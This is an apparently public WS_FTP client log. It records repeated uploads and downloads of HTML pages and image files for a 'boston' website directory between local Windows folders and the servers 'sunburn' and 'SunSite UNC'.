10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
